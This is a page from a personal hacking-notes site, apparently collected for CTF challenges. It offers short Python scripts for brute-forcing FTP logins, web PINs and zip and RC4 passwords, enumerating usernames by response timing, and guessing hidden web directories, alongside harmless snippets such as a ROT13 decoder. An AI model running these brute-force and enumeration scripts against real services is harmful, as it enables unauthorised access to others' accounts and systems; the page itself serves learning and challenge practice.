πŸ‘¨πŸ’»
Hacking Notes
πŸ‘¨πŸ’»
Hacking Notes
πŸ‘¨πŸ’»
Hacking Notes
πŸ‘¨πŸ’»
Hacking Notes
Hacking Notes
One-Liners
Offensive
Exploit Workflow
Recon
Payloads
Websites
Password Attacks
Databases
Microsoft Windows Exploits
Netcat
File Transfers
Metasploit
Priv Escalation
Pivoting
Certificates
Post Exploitation
Misc.
Defensive
Defensive Notes
Windows Forensics
Linux Forensics
Network Forensics
Stego
Malware Analysis
Volatility
Programming
Programming Notes
Examples and Quick Scripts
Pwn
Python
C
Powered by GitBook

Examples and Quick Scripts

This is a page of quick wins and scripts written to achieve certain goals. Copy/paste parts as needed!

Python

FTP Brute Force

Brute forces all passwords from words.txt for the username secure_usertry/except loop.

from ftplib import FTP
import time
​
ftp = FTP()
HOST = 'services.ftp.site'
PORT = 2121
ftp.set_debuglevel(2)
​
​
dictionary = 'words.txt'
password = None
​
with open(dictionary, 'r') as f:
  for line in f.readlines():
    password = line.strip('\n')
    print('trying ' + password)
    time.sleep(0.001)
    try:
      ftp.connect(HOST, PORT)
      ftp.login(user='secure_user', passwd=password)
      ftp.quit()
    except:
      pass
print(password)

RC4 Brute Force

ARC4 brute forcing script written to try and decrypt a string. The decryption attempt is passed to another loop to try and determine if the string is readable ASCII or not. I chose not to pause or quit the loop because I was getting some false positives.

from arc4 import ARC4
​
cipher = b'\x55\x34\xe1\xb2\x17\xdc\x2a\xc5\x21\x26\x77\xe3\xae\x56\xed\x42\xc3\x28\x10\x40\x0a\xfc\xa2\x1d\xef\xab\x11\x1b\xc7'
​
with open("big_set.txt", "r") as keys:
        for line in keys:
                line = line.strip()
                arc4 = ARC4(bytes(line, 'utf-8'))
                new = arc4.decrypt(cipher)
                try:
                        decoder = bytes.fromhex(new.hex()).decode('utf-8')
                        print("Key " + line + " made this:\n" + decoder)
                except UnicodeDecodeError:
                        pass

Zip File Brute Force Guess with B64 Password

This script will attempt to unzip an archive with a password from rockyou. This particular challenge said the password was base64 encoded, which is what the first part of the loop is for. Second part of loop is a try/except loop to pass the unzip error with wrong password.

Alternatively, one could get the zip hash then convert the rockyou list into base64 for each line - I chose to NOT do this to prevent having an extra rockyou file full of base64.

import base64
import zipfile
​
dictionary = '/mnt/d/hashcat-6.0.0/rockyou.txt'
​
with open(dictionary, 'r', errors='ignore') as f:
    for line in f.readlines():
        password = line.strip('\n')
        #print(f'Raw password is {password}')
        encoded = base64.b64encode(str.encode(password))
        #print(f'Encoded password is {encoded}')
​
        with zipfile.ZipFile('./base64.zip','r') as zip_ref:
            try:
                zip_ref.extractall(pwd=encoded)
                print(f'Found! Password is {password}, encoded is {encoded}!')
                quit()
            except:
                pass

Connect to a Website, Establish Session, and Send Data

Establishing a session prevents multiple TCP connections from having to be opened. Additionally, taking the JSON and interpreting natively makes things useful!

import requests
import json
url = 'https://captcha.lol'
​
header = {'User-Agent':'bot'}
s = requests.Session()
r = s.get(url,headers=header)
​
ans = json.loads(r.text)
​
code = ans['code']
nonce = ans['nonce']
print(code)
print(nonce)
p = s.post(url, json=ans, headers=header)
​
print(p.text)

PIN Brute Force for Web Login

This script adds a pin guess for a web login attempt. The pin is zfilled which makes 4 to 004. Additionally there’s a regular expression to find if access was denied or not and give what the PIN was while breaking out of the loop. A final print statement lets me know that they were all looped through, useful when I wasn't sure if my requests were properly formatted.

import urllib
import requests
import re
​
url = "https://vuln.server/admin_login"
​
pin = 0
​
while pin < 1000:
    #headers = {'Cookie' : 'PHPSESSID=qhq84atma883hio9eso7hhsr4j'}
    payload = {'email':'[email protected]','password':str(pin).zfill(3)}
    req = requests.post(url, data=payload, allow_redirects=True)
    if not re.findall('Access Denied', req.text):
        print(f'\npin is {str(pin).zfill(3)}!\n')
        break
    print(str(pin).zfill(3), req.status_code, len(req.content))
    pin = pin + 1
​
print('finished testing')

Username Guessing based on Timing Analysis

This script pays attention to the timing between good usernames and bad ones to help determine if a username is valid.

import requests
from string import ascii_lowercase
with open('surnames.txt') as f:
    lines = f.read().splitlines()
for lname in lines:
    for init in ascii_lowercase:
        username = init+lname
        r = requests.post('http://m4lwhere.org/login.php', data = {'user':username,'pass':'haha'})
        roundtrip = r.elapsed.total_seconds()
        print(f'{roundtrip} for {username}')

Connect to Raw Socket and Pass Data

This challenge required connecting to the socket and brute forcing the first byte back, I didn’t fully finish this challenge because it was a little frustrating. I need to spend more time on this script.

import socket                                                       
                                                                    
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)               
s.connect(('cfta-ne01.allyourbases.co',8017))                       
buf = s.recv(1024)                                                  
s.recv(1024)                                                        
conv = buf.decode('unicode-escape').encode('latin1').decode('UTF-8')
conv = conv + '\n'                                                  
print(conv)                                                         
s.sendall(bytes(conv, encoding='UTF-8'))                            
ans = s.recv(1024)                                                  
win = ans.decode('unicode-escape').encode('latin1').decode('UTF-8') 
print(win)                                                          
s.close() 
import socket
import time
​
def connect():
    s.connect(('challenges.ctf.lol',3008))
​
def recv():
    recv = s.recv(1024)
    print(recv)
​
for i in range(ord('A'),ord('z')+1):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print(f'trying {chr(i)}')
    s.connect(('challenges.ctf.lol',30468))
    recv = s.recv(1024)
    print(recv)
    s.sendall(bytes(chr(i), encoding='utf8'))
    recv = s.recv(1024)
    print(recv)
    s.close()

ROT13 Automatic Decoder

Written by Jess! Automatically finds the decoded input using the enchant library. Searches for legitimate words in the English dictionary, very cool!

import enchant
d = enchant.Dict("en_US")
​
cipher=input("Enter Caesar Shift Cipher to Decode: ")
for n in range(26):
    decode=""
    wordfound=""
    for x in range(0,len(cipher)):
        if ord(cipher[x]) in range(97,123):
            decode+=(chr(((ord(cipher[x])-96+n)%26)+97))
        elif ord(cipher[x]) in range(65,91):
            decode+=(chr(((ord(cipher[x])-64+n)%26)+65))
        elif ord(cipher[x])==(32):
            checkword=d.check(decode)
            if checkword:
                wordfound=("Found!")
            decode+=cipher[x]
        else:
            decode+=cipher[x]
    check=d.check(decode)
    print((n+1),decode,wordfound)

Choose Random Numbers

This program chooses some random integers and assigns them to a string. Nothing fancy.

import random
​
series = random.randint(1,3)
​
book = random.randint(1,6)
​
page = random.randint(1,300)
​
print(f'Series {series}, Book {book}, Page {page}\n\n')

List of all Characters from aa to zz :

Quick way to create a list of all possible lowercase values

from string import ascii_lowercase
for a in ascii_lowercase:
    for b in ascii_lowercase:
        print(a+b)

Below is brute forcing all lowercase characters to find a hidden web dir

import requests
from string import ascii_lowercase
​
url = 'http://m4lwhere.org/'
​
for a in ascii_lowercase:
    for b in ascii_lowercase:
        for c in ascii_lowercase:
            #print(a+b+c)
            fullUrl = url + a + b + c
            r = requests.get(fullUrl)
            if r.status_code != 404:
                print(f'Code {r.status_code} for {fullUrl}')
            else:
                pass

Same one, just with a progress bar!

import requests
from progress.bar import Bar
from string import ascii_lowercase
​
url = 'http://m4lwhere.org/'
​
with Bar('Brute Forcing...', max=26*26*26-1) as bar:
    for a in ascii_lowercase:
        for b in ascii_lowercase:
            for c in ascii_lowercase:
                #print(a+b+c)
                fullUrl = url + a + b + c
                r = requests.get(fullUrl)
                if r.status_code != 404:
                    print(f'\nCode {r.status_code} for {fullUrl}')
                else:
                    bar.next()
                    pass
Programming - Previous
Programming Notes
Next - Programming
Pwn
Last updated 1 month ago